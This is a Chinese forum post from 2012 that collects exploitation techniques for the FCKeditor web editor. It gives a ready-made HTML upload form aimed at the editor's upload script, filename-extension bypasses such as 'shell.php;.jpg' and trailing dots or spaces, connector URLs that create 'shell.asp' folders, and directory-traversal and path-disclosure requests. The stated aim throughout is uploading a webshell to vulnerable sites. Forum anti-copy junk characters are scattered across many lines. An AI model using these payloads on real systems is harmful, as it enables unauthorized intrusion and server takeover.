Fckeditor漏洞利用总结
, [/ H# V1 [$ W# a' |1 C查看编辑器版本
& X* r0 U% J$ a- t: _- R) c$ R: uFCKeditor/_whatsnew.html
4 X, L7 k% D0 A5 V3 O& T2 j—————————————————————————————————————————————————————————————# A* b6 f$ \% S- F% h6 D
8 C0 q& D- x7 p2. Version 2.2 版本
I: S- ?1 i9 p& UApache+linux 环境下在上传文件后面加个.突破!测试通过。
9 I) a* u; p+ r—————————————————————————————————————————————————————————————
6 K" E4 H; A: Y6 d5 }5 j- D' K* S. i/ B1 s7 k# U6 B: B
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。% u$ D/ y6 c" d9 ]
<form id="frmUpload" enctype="multipart/form-data"$ T$ e! `/ n3 H+ m0 H
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> B0 f) z9 C; i3 w a! @7 Q* p6 q6 `
<input type="file" name="NewFile" size="50"><br>3 J8 Y5 d# }* |: J* p# v
<input id="btnUpload" type="submit" value="Upload">
( q: V4 C: Y2 \: v/ D5 \9 J8 t</form>' j+ K1 @- X/ \2 }7 V7 e
—————————————————————————————————————————————————————————————8 |( Y b5 F# ]- w$ \* o
. ]1 _, ~; n7 t: P4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
2 R& p% j8 o8 K$ ` g3 b$ Z 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。5 f$ Y/ Y: ~# d. h
4.1:提交shell.php+空格绕过
/ t/ ]: }9 h$ k, I: Q; s0 D不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。0 h* @5 i, |# Y8 C% e/ J
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。3 t$ ~* j7 ^% ?+ G4 |& x1 |% V s
—————————————————————————————————————————————————————————————( O4 k0 b2 ^' o" \+ F$ w
( D2 U* i, j' F8 I, b# [
5. 突破建立文件夹
: w9 b% H* [" ^: o v3 f* RFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
0 O- a! z8 ^" E# y. E5 L! |( xFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp: M! u. B! |0 T3 P
—————————————————————————————————————————————————————————————" w, q1 G' ~& h7 H2 K
; y" R+ T# Q% E! S6. FCKeditor 中test 文件的上传地址/ \4 V% y+ y. p( v }- f4 B$ T
FCKeditor/editor/filemanager/browser/default/connectors/test.html
( C4 j1 P+ A& FFCKeditor/editor/filemanager/upload/test.html
" E, Y5 f5 h. \FCKeditor/editor/filemanager/connectors/test.html
% D8 w* u, r x' l) JFCKeditor/editor/filemanager/connectors/uploadtest.html
* C: i2 O8 n. X+ W) l' N2 m—————————————————————————————————————————————————————————————
8 b* ]- Y+ {, M3 Y$ _; B
; w1 T9 e8 W& p7.常用上传地址
8 ^8 A8 P1 x) e% S% fFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
7 Q3 F* w9 a! ]' U& C4 M" RFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
$ O+ [& W( W8 F, V w, q6 @. y4 [( TFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
5 q. A6 e5 C4 b" h" o/ E6 rJSP 版:
# j$ o. e1 c& p7 V3 z# }& DFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp- C! a& P+ n- ~# w4 _6 \
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
" H- W- q/ a* _% h c9 k件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。1 Z% r, x) c- z/ d5 S3 T
—————————————————————————————————————————————————————————————5 x" J" E& R9 a+ ]
5 N9 q Z6 L6 f6 Z8.其他上传地址" U8 s$ ^$ d1 y* G1 B2 A0 \
FCKeditor/_samples/default.html2 u$ P" D. _* o' z7 K
FCKeditor/_samples/asp/sample01.asp
% e" Y! \6 W; sFCKeditor/_samples/asp/sample02.asp
# l: X; p6 N$ P6 l) J$ Q1 q+ Y1 DFCKeditor/_samples/asp/sample03.asp
7 s7 j+ ~6 U. @" J4 B) Y7 d, I0 y1 LFCKeditor/_samples/asp/sample04.asp% V$ |' a6 Y J* R2 r0 f" G
一般很多站点都已删除_samples 目录,可以试试。- \8 _- y% _) {, u
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
T* O6 k; c! ^; n3 z# ?—————————————————————————————————————————————————————————————9 M) Z2 e% G; }+ C
" v+ X8 G8 o9 E- v
9.列目录漏洞也可助找上传地址
: j1 m. k2 O* Z) ^8 }; F/ q2 UVersion 2.4.1 测试通过
) ^! y9 _& G; z1 G: \, u( k修改CurrentFolder 参数使用 ../../来进入不同的目录1 v; w# z c0 @( w4 x7 a/ t0 w- q
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
0 t$ O' p- m! E1 {9 O# t& `5 l( S根据返回的XML 信息可以查看网站所有的目录。/ p2 S m0 B) A( j9 _8 \+ I
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
. I5 a- J! Z( G. @+ l% L也可以直接浏览盘符:
" v" t; i& B& M/ q0 t# t( kJSP 版本:: f% d0 G$ p! v% d6 W. j4 C
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F9 O0 A8 r' r( j* Z
—————————————————————————————————————————————————————————————" K3 G( u2 l( p9 k) T
: C& m& s3 s; X$ N' X6 Q+ Z' w10.爆路径漏洞3 \* I; X# n' L- N7 g/ y2 V
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
, T! j7 M! L0 P4 z& X" j1 T2 u—————————————————————————————————————————————————————————————
& I4 X2 a& g9 S* e$ r' V, F8 E; |4 E# L' W# Q$ L0 b- _
11. FCKeditor 被动限制策略所导致的过滤不严问题: p8 J5 i; ?: R$ ^0 U" C; l
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
0 G0 D* K/ ?2 V4 U: K% [) L脆弱描述:
" r* s6 p# N( a3 n/ ^FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
" p) w4 ?$ I4 ]; P: t( y ~html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
8 P, ^/ i& [' u% \& ~, ?, F+ E0 vFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
* A: q4 D; O2 X v/ d 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
" U$ }4 n! h3 n6 b% R2 W) { 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!1 ~2 ], l& d: q" w# Q2 W- l1 r7 K
—————————————————————————————————————————————————————————————% v# e" F# c% X/ r/ t- v( Q
3 ?9 G7 x: a3 s# P- D( l% q7 d12.最古老的漏洞,Type文件没有限制!
: D/ i- k% }) }6 p7 g# W& c 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! ( d& `+ i/ Z. f6 b* a+ N# {1 C; L& P
—————————————————————————————————————————————————————————————2 G+ ^9 W) y- j8 J
2 Z% u# m. x; Q! t+ u===============================================================================================================================================
; t) f, o8 a9 @" c$ D, I' x9 U, i
FCK编辑器jsp版本漏洞:7 m, z; p" v' K6 D( c* D: A
" J% s1 ]/ W( u& h2 d* @
9 v0 @. ^' L: U' h7 ^4 |http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F* B1 O5 {. o* w- a( U
* p1 J, U- T4 L' [+ J$ h w
上传马所在目录 {/ B9 _3 i0 P* ] m( O/ n3 {
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/, s. G; `5 W8 c9 ?
上传shell的地址:7 }( V7 w! x) W4 _5 V
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector4 B' D# j8 q) h/ _' X
跟版本有关系.并不是百分百成功. 测试成功几个站.
3 w7 {( r1 s* ], z7 ]; H: }不能通杀.很遗憾.
8 B) y8 ~7 y3 e* _" Phttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
, S0 x. g1 @4 b$ q# B$ y如果以上地址不行可以试试
5 B% T! Z. x7 e+ X; wFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
( x( w9 t1 T* H. o Q& PFCKeditor/_samples/
' j4 }: U) C! H) X4 x! ^: F) lFCKeditor/_samples/default.html) _# y* |& E# Y% [. X
FCKeditor/editor/fckeditor.htm; X: @# h2 w9 y% x6 d% V: e
FCKeditor/editor/fckdialog.html" ]3 }- l p t; W( v r4 g' H
# C' A4 j, X' c7 W _3 Z
* ?/ P8 s- p& T
+ X: [% B" J7 _! j解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
; k2 w/ O; ~6 d a3 E2 V |
发表于 2012-9-13 17:01:39
收藏
支持
反对